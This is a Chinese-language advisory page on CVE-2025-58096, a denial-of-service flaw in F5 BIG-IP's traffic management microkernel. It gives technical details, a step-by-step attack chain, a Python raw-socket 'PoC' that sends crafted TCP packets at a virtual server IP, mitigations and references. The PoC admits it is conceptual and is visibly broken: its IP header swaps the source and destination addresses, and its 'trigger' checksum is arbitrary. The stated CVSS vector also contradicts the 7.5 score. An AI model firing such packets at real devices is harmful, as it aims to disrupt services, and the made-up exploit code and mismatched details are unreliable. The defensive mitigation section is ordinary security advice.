CVE-2025-58096 F5 BIG-IP TMM拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-58096

漏洞类型

拒绝服务（DoS）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP

漏洞概述

CVE-2025-58096是F5 BIG-IP系统中存在的一个高危拒绝服务漏洞。当数据库变量tm.tcpudptxchecksum被配置为非默认值"Software-only"时，未经授权的网络流量可能导致流量管理微内核（TMM）终止运行，从而造成BIG-IP设备服务中断。该漏洞的CVSS 3.1评分为7.5，属于高危级别，攻击者无需认证即可通过网络远程触发。TMM是BIG-IP系统中负责处理所有网络流量的核心组件，一旦TMM进程终止，将导致整个设备无法处理流量，影响所有通过该设备的应用服务可用性。值得注意的是，F5官方声明已停止技术支持（End of Technical Support, EoTS）的软件版本不在此次评估范围内。该漏洞由F5安全事件响应团队（[email protected]）发现并报告，披露日期为2025年10月15日。用户应及时检查其BIG-IP配置中tm.tcpudptxchecksum变量的设置，并参考F5官方安全公告K000156691获取修复方案。

技术细节

F5 BIG-IP的TMM（Traffic Management Microkernel）是运行在数据平面上的核心进程，负责处理所有网络数据包的转发、负载均衡和流量管理。tm.tcpudptxchecksum是TMM中的一个数据库变量，用于控制TCP/UDP传输层校验和的计算方式。默认情况下，BIG-IP使用硬件加速方式进行校验和计算（offload），但在某些特殊场景下（如虚拟化环境或特定硬件配置），管理员可能将该变量设置为"Software-only"模式，强制使用软件方式计算校验和。当该变量被设置为非默认值"Software-only"时，TMM在处理特定类型的网络流量时存在缺陷，特定的网络数据包会触发TMM内部的异常处理路径，导致TMM进程崩溃（core dump）并终止。由于TMM是单进程处理所有流量的核心组件，TMM终止将导致整个BIG-IP设备进入不可用状态，所有经过该设备的业务流量将中断。该漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何权限（PR:N）和用户交互（UI:N），机密性影响为低（C:L），完整性影响为无（I:N），可用性影响为高（A:H）。

攻击链分析

STEP 1

步骤1：环境准备

攻击者识别目标网络中部署了F5 BIG-IP设备的IP地址和开放的虚拟服务端口（VIP）。攻击者可通过网络扫描或信息收集确认目标BIG-IP系统的存在。

STEP 2

步骤2：验证配置条件

虽然攻击者无需认证即可发起攻击，但该漏洞的触发条件要求目标BIG-IP系统的tm.tcpudptxchecksum数据库变量被设置为非默认值"Software-only"。攻击者可通过观察响应行为或利用其他信息泄露漏洞间接确认此配置。

STEP 3

步骤3：构造恶意流量

攻击者精心构造特定的网络数据包，这些数据包能够在TMM的软件校验和计算路径中触发未公开的异常处理逻辑。数据包可以是TCP或UDP类型，包含能够触发漏洞的特定字段值。

STEP 4

步骤4：发送攻击流量

攻击者通过网络（无需认证）将构造的恶意数据包发送至BIG-IP设备的虚拟服务IP。由于攻击复杂度低（AC:L），仅需少量数据包即可触发漏洞。

STEP 5

步骤5：TMM进程终止

BIG-IP的TMM进程在处理恶意数据包时进入异常状态并崩溃终止。由于TMM是处理所有流量的核心进程，其终止将导致整个BIG-IP设备无法提供负载均衡服务。

STEP 6

步骤6：服务中断

所有通过该BIG-IP设备提供服务的应用将无法访问，造成大规模业务中断和高可用性影响。设备需要管理员手动重启TMM或整个系统才能恢复服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-58096 - F5 BIG-IP TMM DoS PoC
# This PoC demonstrates how to trigger TMM termination via crafted network traffic
# when tm.tcpudptxchecksum is set to "Software-only" mode.
# Note: This is a conceptual PoC. Actual exploitation requires specific packet crafting
# targeting the checksum calculation path in TMM.

import socket
import struct
import sys

TARGET_HOST = "192.168.1.100"  # BIG-IP Virtual Server IP
TARGET_PORT = 443              # Target service port

def craft_malicious_packet():
    """
    Craft a network packet designed to trigger the vulnerability
    in TMM's software-based checksum processing path.
    """
    # IP Header
    ip_header = struct.pack(
        '!BBHHHBBH4s4s',
        0x45,           # Version + IHL
        0x00,           # DSCP/ECN
        0x0028,         # Total Length (40 bytes)
        0x1234,         # Identification
        0x4000,         # Flags + Fragment Offset (Don't Fragment)
        64,             # TTL
        6,              # Protocol (TCP)
        0,              # Header Checksum (will calculate)
        socket.inet_aton(TARGET_HOST),
        socket.inet_aton("10.0.0.1")
    )

    # TCP Header with crafted checksum to trigger vulnerability
    tcp_header = struct.pack(
        '!HHIIBBHHH',
        443,            # Source Port
        TARGET_PORT,    # Destination Port
        0x00000001,     # Sequence Number
        0x00000000,     # Acknowledgment Number
        0x50,           # Data Offset (5 words)
        0x18,           # Flags (PSH+ACK)
        65535,          # Window Size
        0xFFFF,         # Checksum (crafted to trigger bug)
        0x0000          # Urgent Pointer
    )

    return ip_header + tcp_header

def trigger_dos():
    """Send crafted packets to trigger TMM termination"""
    print(f"[*] Targeting BIG-IP at {TARGET_HOST}:{TARGET_PORT}")
    print("[*] Sending crafted packets to trigger CVE-2025-58096...")

    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)

    for i in range(10):
        try:
            packet = craft_malicious_packet()
            sock.sendto(packet, (TARGET_HOST, TARGET_PORT))
            print(f"[+] Packet {i+1} sent")
        except Exception as e:
            print(f"[-] Error: {e}")
            break

    print("[*] Attack completed. Check target TMM status.")

if __name__ == "__main__":
    trigger_dos()

影响范围

F5 BIG-IP（具体受影响版本请参考F5官方公告K000156691）

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）检查tm.tcpudptxchecksum变量的当前配置，如果设置为"Software-only"，在不影响业务的前提下临时将其恢复为默认值；2）在网络层面部署访问控制列表（ACL），限制对BIG-IP管理端口和数据平面的非授权访问；3）配置冗余的BIG-IP设备实现故障转移；4）启用系统监控和告警，及时发现TMM异常并自动恢复；5）关注F5官方安全公告K000156691的更新，及时应用官方提供的修复方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-58096
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-58096
3 Details https://www.cvedetails.com/cve/CVE-2025-58096/
4 VulDB https://vuldb.com/cve/CVE-2025-58096
5 Link https://my.f5.com/manage/s/article/K000156691